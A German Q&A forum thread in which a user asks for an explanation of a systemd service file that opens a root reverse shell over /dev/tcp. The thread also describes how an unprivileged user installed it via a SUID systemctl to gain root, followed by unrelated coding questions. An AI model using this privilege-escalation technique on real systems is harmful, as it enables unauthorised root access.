was macht dieser code?

Was macht folgender code:

Bitte zeile für zeile erklären

[Unit]

Description=root

[Service]

Type=simple

User=root

ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/4242 0>&1'

[Install]

WantedBy=multi-user.target

1 Antwort

PhotonX

Von gutefrage auf Grund seines Wissens auf einem Fachgebiet ausgezeichneter Nutzer

Computer

27.03.2022, 18:11

Das ist eine Service-Datei, die von Systemd gestartet wird.

[Unit]

Description=root

Das ist die Beschreibung des Services (hier einfach "root").

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/4242 0>&1'

Hier wird festgelegt, dass der Typ des Services "simple", also einfach ist, das Service vom Benutzer "root", also dem Administrator, ausgeführt wird. Der ausgeführte Befehl ist dabei das Öffnen einer interaktiven Bash-Shell, alle entstehenden Ausgaben werden via TCP an den Port 4242 gesendet.

[Install]
WantedBy=multi-user.target

Das Service wird an einer bestimmten Stelle (einem sog. Target) des Boot-Vorgangs gestartet.

verreisterNutzer

28.03.2022, 09:42

danke erstmal, aber Ich verstehe nicht ganz wie dieser simple code mich als root user einloggt. der code wurde auf einem linux system verwendet und nutzt dabei die SUID von der systemctl um halt diese shell als root zu generieren.

ausgeführt wurde der code auf dem system mit "systemctl enable /tmp/root.service" und "systemctl start root", von einem user ohne root privileges

könntest du vielleicht nochmal diese beiden befehle erklären und erklären warum mir genau "systemctl" diese rechte ermöglicht und nicht jede andere SUID datei auch?

verreisterNutzer

28.03.2022, 09:47

@verreisterNutzer

Man hatte nach ausführen des codes nämlich zugriff auf das ganze linux system als root user und das verwirrt mich

Ähnliche Beiträge

discord.py, nur bestimmte user id's einen command ausführen lassen?

Hallo, ich suche eine Möglichkeit, dass nur bestimmte User mit einer bestimmten UserID einen bestimmten Befehl ausführen können (Code unten).

Dieser Command soll nur von bestimmten IDs ausgeführt werden:
(Programmiersprache Python, discord.py)

@help.command()
  async def dev(ctx):
    em = discord.Embed(title="**Dev Commands**", colour=discord.Colour.blurple(),
                       description=""
                                   "test")
    await ctx.send(embed=em)

...zum Beitrag

Linux: You need to load kernel first. Wie kann ich booten ohne diese Meldung?

PS: mit dem Code Startet Linux doch ich muss den jedes mal aufs Neue eingeben.

insmod linux linux /vmlinuz root=/dev/sda2 initrd /initrd.img boot

...zum Beitrag

PHP: assoziatives Array mit allen Inhalten aus einer Tabelle füllen und als JSON Objekt speichern?

Moin,

ich möchte ein Objekt erstellen, in das ein assoziatives Array, gefüllt mit allen Zeilen aus einer Tabelle in einer Datenbank, kommen soll. Mir fehlt dazu allerdings die genaue Logik, wie ich denn überhaupt das Array richtig fülle. Ich habe folgenden Code:

$stmt = $con->query("SELECT * FROM Tabelle1 WHERE ID=$id");
$row = $stmt->fetch();

Die Tabelle in der Datenbank sieht wie folgt aus:

|  ID  |  Description  |
+------+---------------+
|   1  |  Hello World  |
+------+---------------|
|   2  |  Testing...   |

Ich könnte mir ein Ergebnis bspw. mit

$result1 = $row['Description'];

speichern, allerdings will ich das gleich in ein assoziatives Array speichern, also wie folgt:

$arr = array("description"=>$row['Description']);

Meine Frage lautet: Mit welcher Schleife und wie kann ich denn alle Ergebnisse in das Array speichern? Gibt es dafür ein Code Snippet?

Danke im Voraus.

...zum Beitrag

Raspberry Pi - sh.-Script mit PHP ausführen - sudo/root-Rechte?

Hallo ich habe ein kleines bash-script , dass sieht so aus:

#!/bin/bash
sudo hdparm -y /dev/sda1

Der Dateiname lautet : script.sh

Ich habe einen Webserver mit Apache2 und Php5

Nun möchte ich die bash-Datei mit PHP ausführen. Allerdings funktioniert das nicht. Ich habe seeeehr viel gegoogelt und immer wurde gesagt es liegt an den Rechten, aber nie funktioniert es. Ich verzweifle echt dolle im Moment.

Kann mir bitte einer erklären wie ich das hinbekomme?

Ps. Die PHP Datei heißt index.php und liegt bei /var/ww

pps. Es geht mir nicht darum, dass es sicher ist! Da alles eh nur local läuft :D

lg. findo

...zum Beitrag

ARCH-Chroot: chpasswd authentication token manipulation error?

Ich habe ein Installations-Script für Arch-Linux geschrieben.

Doch wenn dieser Befehl ausgeführt wird:

arch-chroot /target bash -c "echo root:'$root_pass' | chpasswd"

Bekomme ich immer einen "authentication token manipulation error". Wie behebe ich das?

Ich chroote mich nicht in das Installations-verzeichnis rein und führe dann alle Befehle aus, sondern chroote ich mich für jeden Befehl erneut rein.

Wer möchte kann sich den ganzen Code mal unter https://github.com/Niklas20114552/arch-tui-installer/blob/main/setup angucken.

...zum Beitrag

Python 3 pip wird nicht erkannt?

Hi,

habe schon länger das Problem, dass ich in der Konsole bzw. in VS-Code kein pip o.Ä. zum laufen bekomme. Pip ist installiert wenn ich "py -m ensurepip --upgrade" eingebe wird mir angezeigt: "Requirement already satisfied". Wenn ich nun pip nutzen will z.B. "py pip install discord" bekomme ich das: "C:\Users\username\AppData\Local\Programs\Python\Python310\python.exe: can't open file 'C:\\Users\\username\\Documents\\#Shared\\dev\\pip': [Errno 2] No such file or directory". Habe bereits scripts und side packages zu path Tabele hinzugefügt! In PyCharm funktioniert alles einwandfrei würde aber gerne VS-Code benutzen. Irgendwelche Vorschläge was ich jetzt noch machen kann?

...zum Beitrag

Unerwartetes Dateiende in BASH Script?

Hallo,

In meinem Bash Programm wird beim Compilen "Unerwartetes Dateiende" angezeigt.

Woran liegt das ?

CODE:

#!/bin/bash
# Functions
function pingpass(){
   dialog --msgbox "Ping Successfull ! -> Host is Online !"
   sleep 4
   dialog --clear
   logonconf
}
function pingfail(){    dialog --msgbox "Ping Failed ! -> Host is Offline !"    sleep 4    dialog --clear    dialog --msgbox "Programm Terminated because of an Error !" }
function logoncof(){    dialog --title "RDP Logon Srcipt" --yesno "Please confirm your choosen Option:\n $logon" 0 0 }

Main
logon=
dialog --title "RDP Logon Srcipt" --menu "Please choose a Server to Logon !" 0 0 0 \
&nbsp;"Linux1" "" "Linux2" "" "Linux3" "" 3&gt;&amp;1 1&gt;&amp;2 2&gt;&amp;3
 dialog --clear

if [$logon = "Linux1"]
   then
      ping -c1 192.168.2.1 > /dev/null
      if [ $? -eq 0 ]
    then 
   pingpass
    else
   pingfail
fi

...zum Beitrag

Bash Error: Dateiende beim Suchen nach ` " ' erreicht. Was tun?

Hey,

Ich arbeite momentan an einem Datei Manager für die Shell. Jetzt habe ich folgende Fehlermeldungen:

Datei_Manager.sh: Zeile 180: Dateiende beim Suchen nach ` " ' erreicht

Datei_Manager.sh: Zeile 183: Syntax Fehler: Unerwartetes Dateiende

Meinen ganzer Code ist zu lang um den hier jetzt einzufügen. Ich wollt einfach nur mal wissen, was die möglichen Fehler sind die ich gemacht haben könnte weshalb die beiden Fehlermeldungen erscheinen, damit ich gezielter suchen kann.

Also:

Welche möglichen Fehler könnte ich gemacht haben?

Danke schon im vorraus für (schnelle) Antworten!

Bastian

...zum Beitrag

Docker Fehlermeldung?

Nabend,

ich möchte sozusagen als Client auf einen Containerzugreifen der dann als Server fungieren soll. Den Container hab ich so erstellt:

docker run -e MYSQL_ROOT_PASSWORD=rootpw -d --name mysqlserver1 --publish 3306:3306 mysql

Der Port 3306 wurde auf den Port 3306 gemappt. Das Image hat den Namen mysql erhalten. Das Mapping funktioniert auch. Dies habe ich mit

Docker ps

überprüft.

Ich will mich sozusagen als Client auf den Servercontainer einloggen. Das mache ich folgendermaßen:

PS C:\> mysql -h 127.0.0.1 -P 3306 -u root -p

Führe ich das aus, bekomme ich folgende Fehlermeldung:

mysql : Die Benennung "mysql" wurde nicht als Name eines Cmdlet, einer Funktion, einer Skriptdatei oder eines ausführbaren Programms erkannt.
Überprüfen Sie die Schreibweise des Namens, oder ob der Pfad korrekt ist (sofern enthalten), und wiederholen Sie den Vorgang.
In Zeile:1 Zeichen:1

Offenbar stört er sich an dem Imagenamen. Gebe ich die Container ID an oder den Namen, funktioniert ebenfalls nicht.

Ich habe natürlich gegoogelt, aber es stellte sich als Unwahrheit heraus :)

Danke im Voraus

...zum Beitrag

./startserver.sh: line 58: unexpected EOF while looking for matching ./startserver.sh: line 61: syntax error: unexpected end of file?

Ich habe das Problem ich finde nicht den Fehler könnte mir jemand helfen bin erst anfänger.

Will einen Minecraft Serverstarter machen.

#!/bin/bash


    if [ -f craftbukkit-1.16.5.jar ]; then
            echo "Skipping download. Using existing craftbukkit-1.16.5.jar"
            java -Xmx5G -Xms5G -jar craftbukkit-1.16.5.jar
               if [[ $DO_RAMDISK -eq 1 ]]; then
               sudo umount $SAVE_DIR
               rm -rf $SAVE_DIR
               mv "${SAVE_DIR}_backup" $SAVE_DIR
               fi
    else
            export URL="https://cdn.getbukkit.org/craftbukkit/craftbukkit-1.16.5.jar"
    fi
        echo $URL
        which wget >> /dev/null
    if [ $? -eq 0 ]; then
        echo "DEBUG: (wget) Downloading ${URL}"
        wget -O craftbukkit-1.16.5.jar "${URL}"
   else
        which curl >> /dev/null 
        if [ $? -eq 0 ]; then
        echo "DEBUG: (curl) Downloading ${URL}"
        curl -o craftbukkit-1.16.5.jar "${URL}"
        else
        echo "Neither wget or curl were found on your system. Please install one and try again"
        fi
    fi
    
    if egrep -q eula=true eula.txt; then
            echo Starting ...
            java -Xmx5G -Xms5G -jar craftbukkit-1.16.5.jar nogui
            exit
    else
        Height=15
        WIDTH=40
        CHOICE_HEIGHT=4
        BACKTITLE="Bukkit"
        TITLE="Choice"
        MENU="Do you accet the eula at (https://account.mojang.com/documents/minecraft_eula) ? "
        OPTIONS=(1 "Yes
                 2 "No")


        CHOICE=$(dialog --clear \
                        --backtitle "$BACKTITLE" \
                        --title "$TITLE" \                              --menu "$MENU" \
                        $HEIGHT $WIDTH $CHOICE_HEIGHT \
                        "${OPTIONS[@]}" \
                        2>&1 >/dev/tty)


            clear
            case $CHOICE in
                    1)
                        echo "You accepted the eula..."
                        sed s/false/true/g eula.txt
                        java -Xmx5G -Xms5G -jar craftbukkit-1.16.5.jar nogui
                        ;;
                    2)
                        echo "You not Accepted the eula"
                        ;;
    fi

...zum Beitrag

Kann mir jemand diese Fehlermeldung erklären?

Ich wollte libapache2-Mod-php5 auf meinem Debian 8 Server installieren, aber dann ist dieser Fehler gekommen:

E: Sub-process /usr/bin/dpkg returned an error code (1)
root@srv48950:~# sudo aptitude install libapache2-mod-php5
sudo: aptitude: command not found
root@srv48950:~# apt-get install php5 libapache2-mod-php5
Reading package lists... Done
Building dependency tree
Reading state information... Done
libapache2-mod-php5 is already the newest version.
php5 is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
1 not fully installed or removed.
After this operation, 0 B of additional disk space will be used.
Do you want to continue? [Y/n] y
Setting up libapache2-mod-php5 (5.6.33+dfsg-0+deb8u1) ...
dpkg: error processing package libapache2-mod-php5 (--configure):
subprocess installed post-installation script returned error exit status 1
Errors were encountered while processing:
libapache2-mod-php5
E: Sub-process /usr/bin/dpkg returned an error code (1)
root@srv48950:~#

Kann mir jemand helfen?

...zum Beitrag

Bash Script um DNS umzustellen?

Habe einmal ein Bash Script und eine .Desktop Verknüpfungen auf meinem Arch KDE und wollte bei Doppelklick auf die Verknüpfungen zb Updaten oder DNS auf 8.8.8.8 oderr Automatisch Umstellen.

(Ich kann auch via KDE Connect das ganze Starten und ohne EIngabe abschließen mit sudo pacman -Syu --noconfirm && yay -Syu --noconfirm)

Aber bei toggle_dns funktioniert das leider nicht mit dem gelieferten Code von ChatGPT (siehe Unten) und ich kann garkein Bash, nur "normale" programmiersprachen wie JavaScript oder PHP. Mit Python würde ich es vielleicht hinkriegen aber das ist doch viel aufwendiger jetzt die IDE erneut zu installieren als mit Bash.

Wenn es das gibt wollte ich eine KDE eigene Benachrichtigung in welchen Modus es jetzt gewechselt ist zb : DNS auf Automatisch umgestellt oder DNS auf 8.8.8.8 Umgestellt statt ein Terminal was ich dann noch per hand schließen muss.
Kann mir jemand weiterhelfen den Code zu reparieren ?

toggle_dns.sh :

#!/bin/bash

# Datei und Schnittstelle für die DNS-Konfiguration
RESOLV_CONF="/etc/resolv.conf"
INTERFACE="Netzwerkschnittstelle_von_euch"

# Funktion zum Setzen des DNS-Servers auf 8.8.8.8
set_dns() {
  echo -e "nameserver 8.8.8.8\noptions edns0" | sudo tee $RESOLV_CONF > /dev/null
  sudo systemctl restart NetworkManager
  notify "DNS wurde auf 8.8.8.8 gesetzt."
}

# Funktion zum Zurücksetzen des DNS-Servers auf automatisch
reset_dns() {
  sudo rm -f $RESOLV_CONF
  sudo systemctl restart NetworkManager
  notify "DNS wurde auf automatisch gesetzt."
}

# Funktion zum Senden einer KDE-Benachrichtigung
notify() {
  message=$1
  kdialog --passivepopup "$message" 5
}

# Überprüfen, ob der DNS-Server bereits auf 8.8.8.8 gesetzt ist
if grep -q "8.8.8.8" $RESOLV_CONF; then
  echo "DNS ist derzeit auf 8.8.8.8 gesetzt. Umschalten auf automatisch."
  reset_dns
else
  echo "DNS ist derzeit automatisch konfiguriert. Umschalten auf 8.8.8.8."
  set_dns
fi

...zum Beitrag

Assembler Strings zusammensetzen?

Hallo, ich versuche derzeit in NASM Assembler Strings bzw. zu einer Zeichenkette ein Zeichen hinzuzufügen, das klappt auch, aber nur wenn ich in Zeile 15 schreibe:

mov rsi, 30h <- Sagt dem Assembler er soll 0 als ASCII Code schreiben

Aber wenn ich versuche hier direkt meinen msg2 einzusetzen

mov rsi, msg2 <- kommt in der Konsole ein Fragezeichen bzw. seltsame Zeichen

Die erste Ausgabe auf der Konsole kommt Zustande bei: mov rsi, msg2

Die zweite bei mov rsi, 30h <- So möchte ich es btw. auch!

http://prntscr.com/r2rxwr

Wundert euch nicht über diese Formulierungen, ich bin absoluter Anfänger!

...zum Beitrag

Visual Studio Code erkennt pip nicht?

Hallo,

ich wollte in Python das PIL.Image-Tool einbinden.

Dafür habe ich diesen Befehl eingegeben:

pip install Pillow

Anschließend kam diese Fehlermeldung:

pip : Die Benennung "pip" wurde nicht als Name eines Cmdlet, einer Funktion, einer Skriptdatei oder eines ausführbaren Programms erkannt. Überprüfen Sie die Schreibweise des Namens, oder ob der Pfad korrekt ist (sofern enthalten), und wiederholen Sie den Vorgang.

In Zeile:1 Zeichen:1

+ pip install Pillow

+ ~~~

+ CategoryInfo : ObjectNotFound: (pip:String) [], CommandNotFoundException

+ FullyQualifiedErrorId : CommandNotFoundException

Kann mir da jemand helfen?

...zum Beitrag

Was möchtest Du wissen?

Deine Frage stellen